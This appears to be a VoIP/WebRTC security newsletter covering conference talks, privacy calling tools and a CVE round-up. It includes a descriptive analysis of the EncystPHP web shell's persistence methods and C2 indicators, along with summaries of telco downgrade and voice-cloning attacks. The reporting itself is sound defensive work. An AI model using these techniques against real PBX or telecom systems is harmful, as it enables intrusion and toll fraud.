We’re kicking off 2026 with a packed edition. A Cisco UCM zero-day is being actively exploited, 39C3 had some excellent talks on VoLTE and satellite eavesdropping, and the FreePBX vulnerability chain we covered last year now has both a Metasploit module and a weaponized web shell in the wild.
In this edition, we cover:
- Back to breaking things in 2026: what we’re working on and what we found in 2025
- 39C3 talks of interest: South Korean telco breaches, satellite SIP/RTP leaks, and ISDN at Congress
- EncystPHP web shell exploits FreePBX: INJ3CTOR3 is back targeting PBX systems
- Element Call and Magicall: WebRTC-based privacy communication tools
- Phone phreaking, social engineering in the age of voice AI and voice biometrics
- Yealink RPS vulnerability finally gets a CVE
- Security updates round-up: Cisco UCM zero-day, Zoom MMR command injection, ALGO 8180 SIP RCE zero-days, coturn weak RNG, and more
The RTCSec newsletter is a free periodic newsletter bringing you commentary and news around VoIP and WebRTC security. We cover both defensive and offensive security as they relate to Real-time Communications.
What is RTC security anyway? Real-time communications security determines if you can safely communicate in real time - whether it be with other humans or machines.
You may sign up to receive the RTCSec newsletter here. If you like what we’re doing, you’re most welcome to:
- Forward it to those who may find this newsletter particularly fruitful.
- Let us know if there are any RTC security news items we should cover.
To view past issues, please visit our website at https://www.enablesecurity.com/newsletter/.
Our news
Back to breaking things in 2026
We’re back to pentesting full time in 2026. Right now we’re working on an engagement involving media streaming based on Wowza together with Janus for the WebRTC side, along with various API calls and many other interesting components. The vulnerabilities we’re finding are very specific to the software stack and the client, so we can’t disclose much. But this is a really interesting area where media streaming and WebRTC intersect. Protocols like HLS, RTMP and SRT are always fun to mess with, and these systems rely heavily on the security of the APIs they’re built on. This is clearly an undertested area in cybersecurity, and we’re finding a lot of good stuff. We have some experience with Janus, but it’s always fun to poke at and figure out what could go wrong. Wowza is new territory for us though, and it’s been a great learning experience so far.
In 2025 we did a number of VoIP pentests that almost all had the usual suspects: RTP Bleed, RTP Inject, DoS on signaling through SIP message flooding. Well-known issues, but clearly not well-tested. We also covered other targets beyond SIP. HTTP is found everywhere, but most APIs and webapps are surprisingly fragile and vulnerable to application-layer DoS. Hardcoded secrets are still showing up in 2025 and 2026, both in desktop applications and in JavaScript exposed on the Internet.
With that, we look forward to a year of vulnerabilities, security fixes, infused with AI and its effects on cybersecurity!
What’s happening?
39C3 talks of interest
The 39th Chaos Communication Congress (39C3), held in December 2025, featured some great talks touching on telco security, satellite eavesdropping, and legacy telephony.
Learning from South Korean Telco Breaches is a must-watch for anyone working with VoLTE and SIP. Researchers described how VoLTE implementation weaknesses at KT (Korea Telecom) led to a major operator billing breach through SMS and voice payload hijacking. Some of the findings presented:
- Researchers showed SIP traffic transmitted in clear text on certain configurations (e.g. older Xiaomi phones with Qualcomm modems had no ciphering or integrity protection for SIP)
- The talk demonstrated encryption downgrades using SIP 401/406 responses to disable IPSec
- The South Korean TTA VoLTE standard deviated from the 3GPP spec (TS 33.203), allowing connections to proceed even when security negotiation failed
- Femtocells gave attackers direct access to the S1 user plane in clear text
- The talk noted that carrier profiles, including on iOS, did not enable IPSec for IMS traffic for over a decade
Don’t look up: There are sensitive internal links in the clear on GEO satellites (research paper: PDF) demonstrates SIP and RTP traffic broadcast in the clear over geostationary satellite links used for cellular backhaul. Providers strip LTE encryption at the tower and treat the satellite link as trusted internal infrastructure, inadvertently broadcasting raw call contents across a continental footprint. Some highlights:
- T-Mobile tower traffic in remote US regions used IPSec with a null cipher, allowing researchers to recover full phone call audio
- Telmex traffic from Mexico included unencrypted SIP call setup and voice data
- Researchers also observed unencrypted VoIP traffic directed at a city with a large US Navy base
ISDN + POTS Telephony at Congress and Camp is a fun one. While the main Congress phone infrastructure (POC) has fully migrated to VoIP, this talk covers building a vintage ISDN and POTS network for services that VoIP handles poorly: dial-up modems, ISDN data calls, fax, and older protocols like BTX and Minitel. The legacy Siemens EWSD switch connects to the VoIP world through an ISDN-to-SIP gateway called “Noodle”.
EncystPHP web shell exploits FreePBX CVE-2025-64328
FortiGuard Labs published a report on EncystPHP, a weaponized web shell that exploits CVE-2025-64328 (post-authentication command injection in FreePBX Endpoint Manager). We covered this CVE in the November 2025 newsletter. This report shows the vulnerability is now being actively exploited in the wild.
The attack is attributed to INJ3CTOR3, a threat actor group that has been targeting VoIP infrastructure for years. Check Point Research first documented them in 2020 exploiting CVE-2019-19006 on Asterisk systems. Their main goal is selling phone numbers, call plans, and live access to compromised VoIP services. They moved to exploiting Elastix systems via CVE-2021-45461 in 2021-2022. So this group is no stranger to PBX systems.
The EncystPHP webshell is quite thorough in what it does:
- Persistence: Creates a root-level user account (
newfpbx), injects SSH keys, and sets up crontab entries to re-download the payload every minute. - Competing malware removal: The dropper actively hunts and removes other webshells on the system, deleting files containing strings like “Badr”, “b3d0r”, and “pastebin”.
- Webshell deployment: Copies itself to multiple FreePBX module directories disguised as
ajax.php, with timestamp forgery and.htaccessURL rewriting to avoid detection. - PBX-aware functionality: The webshell interface (titled “Ask Master”) includes Asterisk channel queries and SIP peer listings alongside the usual file enumeration and command execution. It is designed to work in both FreePBX and Elastix environments.
- C2 infrastructure: Traffic originates from Brazil (
45.234.176.202), with a C2 domain (crm.razatelefonia.pro) that appears to be a VoIP management system frontend.
The current campaign started around December 2025 and targets FreePBX Endpoint Manager versions 17.0.2.36 through 17.0.3.
WebRTC-based privacy communication tools: Element Call and Magicall
This month we take a look at two browser-based, privacy-focused tools for voice and video communication built on WebRTC. Element Call has been in the works for a while and shipped as the default call experience in Element X back in September 2024, but a detailed architecture talk at Matrix Conference 2025 gave us a closer look at the security and privacy design. Magicall, on the other hand, is a brand new entrant from a cryptography consultancy. Both promise End-to-End Encryption (E2EE) and various privacy features. Note that we have not tested the security of these tools ourselves. This is a quick review based on what these projects claim to offer, to give you an idea of what’s happening in this space.
Element Call
Element Call is a federated real-time communication platform built on the Matrix protocol. At Enable Security we are fans of the Matrix protocol and their vision, so we’re glad to see them finally moving away from third-party conferencing systems (e.g., Jitsi in the past) to a native solution tied to the rest of the platform. They still rely on third-party software (LiveKit SFU), but this is now tightly integrated. Such changes help significantly in reducing the gap between user expectations of security and privacy versus reality.
Here is a summary of the security and privacy features that make MatrixRTC attractive:
- True end-to-end encryption (E2EE): MatrixRTC uses “Insertable Streams” (frame-level encryption) to encrypt media on the client device before it reaches the network. This ensures the server (SFU) forwards opaque packets and cannot decrypt or view the content, even while managing bandwidth.
- Sovereign multi-SFU architecture: Unlike centralized platforms, MatrixRTC allows a multi-SFU setup where participants publish media to their own homeserver’s SFU. This ensures users keep control of their media upload path and data remains within their trusted infrastructure.
- Metadata sovereignty: Users choose where their metadata resides (on their self-hosted or chosen homeserver) rather than exposing interaction data to a single centralized vendor.
- Granular access control: The system strictly enforces Matrix room permissions, distinguishing between “full-access” users (who can publish media) and “restricted” users. This prevents unauthorized participants from consuming server resources or injecting media into the call.
- “Invisible” cryptography: The framework is moving to exclude non-cross-signed devices entirely, ensuring that only verified, trusted devices can participate in encrypted calls, eliminating the risk of unverified eavesdroppers.
- Traffic obfuscation: Support for TURN-TLS allows RTC traffic over TLS on port 443, helping it blend with typical HTTPS/TLS egress and traverse restrictive firewalls.
Status: Actively developed as the next-generation conferencing solution for the Matrix ecosystem.
Magicall
Magicall is a brand new browser-based, end-to-end encrypted video calling service built by Symbolic Software, a Paris-based cryptography consultancy. It operates on a “zero friction” model, requiring no accounts for guests and no software downloads.
The key security and privacy features include:
- True end-to-end encryption (E2EE): All video, audio, and chat are encrypted directly in the browser using AES-256-GCM (SFrame) before they ever reach the network.
- Zero-knowledge architecture: Servers act as “dumb relays” that route encrypted blobs; they cannot decrypt your calls or read your messages.
- Anti-tamper verification: Features “Short Authentication Strings” (SAS) that allow you to verify participants via a 4-word code, ensuring no Man-in-the-Middle (MITM) attacks are occurring.
- Strict privacy guarantees: The service promises no AI training on your calls, no ads, and no selling of user data.
- EU jurisdiction & GDPR: Symbolic Software, a French company, built and hosts the platform in the EU, with full GDPR compliance by default.
- Cryptography background: The team has a track record in applied cryptography and has participated in public security reviews (e.g., 1Password’s cryptography review with Cure53).
- Double layer protection: Media is protected by two layers of encryption: E2E (SFrame) plus standard WebRTC transport encryption (SRTP).
Trust Model: Users must trust the server delivers unmodified JavaScript; also relies on browser WebCrypto and RTCRtpScriptTransform integrity.
Status: Alpha (as of January 2026). Supports up to 256 participants in the Pro tier.
Phone phreaking, social engineering in the age of voice AI and voice biometrics
Skyler Tuter, a security consultant from TrustedSec, gave a presentation at Wild West Hackin’ Fest in Deadwood, South Dakota. The talk, “Exploiting AI: A Case Study on Voice Biometric Penetration Testing”, covers AI-driven voice cloning against both IVR systems and human help desk agents.
The first case study details the compromise of a bank’s Interactive Voice Response (IVR) system, where 8 out of 9 test accounts were accessed by bypassing voice print verification. The second demonstrates impersonation of a corporate CIO, leading a help desk agent to reset administrator account passwords within a two-minute phone call.
I found it quite entertaining as it involves caller ID spoofing (with Zoiper), bypassing biometric matching by using AI voice cloning from ElevenLabs, no multi-attempt lockout policy and a pinch of social engineering. The presentation doesn’t go into the telephony setup details, but they likely interfaced with the target bank through SIP or used a phone provider that allowed spoofed caller IDs for PSTN. That side of the attack chain would have been interesting to hear more about.
What makes this relevant for our audience is that the VoIP and telephony layer is the enabler for these attacks. Caller ID spoofing via SIP, the ability to programmatically place calls, and the lack of authentication at the network level are what make AI voice cloning practical. As voice biometrics become more common in banking and enterprise environments, the telephony infrastructure that VoIP/UC engineers build and maintain becomes a direct part of the attack surface. If you’re running voice systems that rely on caller ID or voice biometrics for any form of trust, this talk is worth watching.
Yealink RPS vulnerability finally gets a CVE
Yealink has published a security bulletin acknowledging CVE-2025-68644 (CVSS 7.4), an unauthorized information disclosure vulnerability in their Redirect and Provisioning Service (RPS). If you’ve been following our coverage, this is the same issue that researchers Jeroen Hermans and Stefan Gloor have been disclosing since mid-2025.
We first covered this in the June 2025 newsletter when the researchers published on Full Disclosure, and again in August 2025 when they presented at the WHY 2025 hacker camp. At the time, Yealink’s own advisories downplayed the severity and lacked detail. The researchers disagreed, pointing out that the CA private key shipped with every phone allowed attackers to access provisioning data (including SIP credentials) for any Yealink device worldwide.
Now, months later, Yealink has assigned CVE-2025-68644 and published a third-party verification report by NetSPI confirming the remediation. According to the bulletin, RPS instances before 2025-06-27 were affected, and the fix was applied cloud-side through an enhanced authentication mechanism.
Timeline
- 2025-05-19: Researchers report the issue to Yealink.
- 2025-06-20/21: Public disclosure on Full Disclosure mailing list.
- 2025-06-27: Yealink claims the issue was fixed cloud-side. RPS instances before this date were affected.
- 2025-08-11/12: Research presented publicly at WHY 2025 (CCC ecosystem).
- 2025-09-19: NetSPI remediation testing date (per report).
- 2025-09-29: NetSPI report date (per report).
- 2025-11-27: Yealink publishes the Trust Center bulletin and acknowledges CVE-2025-68644.
- 2025-12-21: Earliest archive.org capture of both the bulletin page and the NetSPI PDF.
It took over six months from initial disclosure to a formal CVE acknowledgement. The timeline is worth noting for anyone dealing with Yealink vulnerability disclosures in the future.
Security Updates and Vulnerability News Round-Up
Cisco UCM zero-day RCE actively exploited (CVE-2026-20045)
An actively exploited remote code execution vulnerability (CVE-2026-20045, CVSS 8.2) affecting Cisco Unified Communications Manager, UCM SME, IM & Presence Service, Unity Connection, and Webex Calling Dedicated Instance. Cisco PSIRT reports attempted exploitation in the wild and broad scanning for exposed interfaces, and CISA added it to the KEV catalog. Cisco lists 14SU5 as the first fixed release for 14.x and 15SU4 (scheduled March 2026) as the first fixed release for 15.x; COP patch files exist for certain interim SU releases (and 12.5 must migrate to a fixed release).
Zoom MMR command injection (CVE-2026-22844)
A critical command injection vulnerability (CVE-2026-22844, CVSS 9.9) in Zoom Node Multimedia Routers (MMR) allows authenticated meeting participants to execute arbitrary code remotely. Affects Zoom Node Meetings Hybrid and Meeting Connector versions before 5.2.1716.0. This could enable compromise of multimedia routing infrastructure. Upgrade to MMR version 5.2.1716.0 or later.
ALGO 8180 IP Audio Alerter SIP RCE zero-days (CVE-2026-0792, CVE-2026-0794)
Two zero-day vulnerabilities in the ALGO 8180 IP Audio Alerter allow unauthenticated remote code execution via crafted SIP traffic. CVE-2026-0792 is a stack-based buffer overflow triggered through a crafted SIP INVITE Alert-Info header, and CVE-2026-0794 is a use-after-free in SIP call handling. Discovered by Vera Mens at Claroty Research (Team82) and published via ZDI. No patches available; ZDI recommends restricting SIP exposure and network isolation.
Mitel MiVoice MX-ONE authentication bypass (CVE-2025-67822)
A critical authentication bypass (CVE-2025-67822) in the Provisioning Manager of Mitel MiVoice MX-ONE affects versions 7.3.0.0.50 through 7.8.1.0.14. The vulnerability allows unauthorized access to admin accounts.
Metasploit module: FreePBX unauthenticated SQL injection → create admin user
Rapid7 released a Metasploit module that leverages the FreePBX “Rabbit Hole” issues to perform an unauthenticated SQL injection and create a new FreePBX administrative user (CVE-2025-66039 and CVE-2025-61675). We covered these vulnerabilities in the December 2025 edition.
coturn: Weak RNG for nonce and port randomization (CVE-2025-69217)
A cryptographic weakness (CVE-2025-69217, CVSS 7.7) in coturn versions 4.6.2r5 through 4.7.0-r4 where a 2023 commit replaced OpenSSL’s RAND_bytes with the unsafe libc random() function. An attacker observing roughly 50 sequential nonces can reconstruct the RNG state, predict future nonces and relay port allocation, and send authenticated TURN requests from spoofed IPs (if credentials are known). Reported by Mathy Vanhoef and jornlp. Upgrade to 4.8.0 or later.
Windows Telephony Service elevation of privilege (CVE-2026-20931)
A high-severity elevation of privilege vulnerability (CVE-2026-20931, CVSS 8.0) in Windows Telephony Service (TAPISRV) allows an authorized attacker to elevate privileges over an adjacent network by exploiting external control of file name or path. Patched in the January 2026 Patch Tuesday.
Pexip Infinity v39 WebRTC DoS fixes
Pexip Infinity v39 fixes multiple WebRTC-related denial of service issues. A crafted media stream can trigger a controlled abort in media processing (CVE-2025-66379), crafted signalling can cause a temporary DoS when “Direct Media for WebRTC” is enabled (CVE-2025-66443), and insufficient access control in RTMP allows attackers to disconnect streams traversing a Proxy Node (CVE-2025-66378). Upgrade to v39.
µURU dialplan injection via federation name (CVE-2025-69205)
A dialplan injection vulnerability (CVE-2025-69205, CVSS 6.3) in the Asterisk federation feature of µURU allows injection of special characters into the Dial() application through improper input validation on federation names. This enables unauthorized call redirection and potential toll fraud. Reported by Moritz Wörmann and patched in a commit.
Microsoft Teams social engineering targets London councils after breach
Staff at Kensington and Chelsea, Westminster City, and Hammersmith and Fulham councils were targeted through Microsoft Teams with follow-on social engineering (unexpected calls and meeting invitations) after a breach in late 2025. Teams continues to be a first-class phishing and initial-access surface.
Microsoft Teams enables messaging security defaults
Starting January 12, 2026, Microsoft Teams automatically enables messaging safety features by default, including file type protection, malicious URL detection, and user reporting. Applies to tenants using default safety configurations. Worth noting that these defaults protect internal tenant messaging but don’t address the cross-tenant guest access architecture issue where users lose home organization Defender protections when joining external tenants.
Cisco IP phones arbitrary file write (CVE-2025-20335)
A medium severity vulnerability (CVE-2025-20335, CVSS 5.3) in Cisco Desk Phone 9800, IP Phone 7800/8800, and Video Phone 8875 allows unauthenticated remote attackers to write arbitrary files through inadequate directory permission controls. Requires Web Access to be enabled (disabled by default).
Cisco phones information disclosure (CVE-2025-20336)
An information disclosure vulnerability (CVE-2025-20336) in the same Cisco phone models (Desk Phone 9800, IP Phone 7800/8800, Video Phone 8875) allows unauthenticated remote attackers to access sensitive data. Also requires Web Access to be enabled.
TP-Link VX800v SIP DoS (CVE-2025-15542)
A SIP-based denial of service vulnerability (CVE-2025-15542, CVSS 6.3) in TP-Link VX800v v1.0 allows unauthenticated attackers to flood the device with crafted INVITE messages, blocking all incoming voice calls. Fixed in firmware 800.0.12 (Build 250912).
Thanks to Vulners and other third parties for providing vulnerability source material.
This newsletter was prepared by Sandro Gauci and the Enable Security team for RTCSec newsletter subscribers. If you have someone in mind who would benefit from our content, please share.
To subscribe: here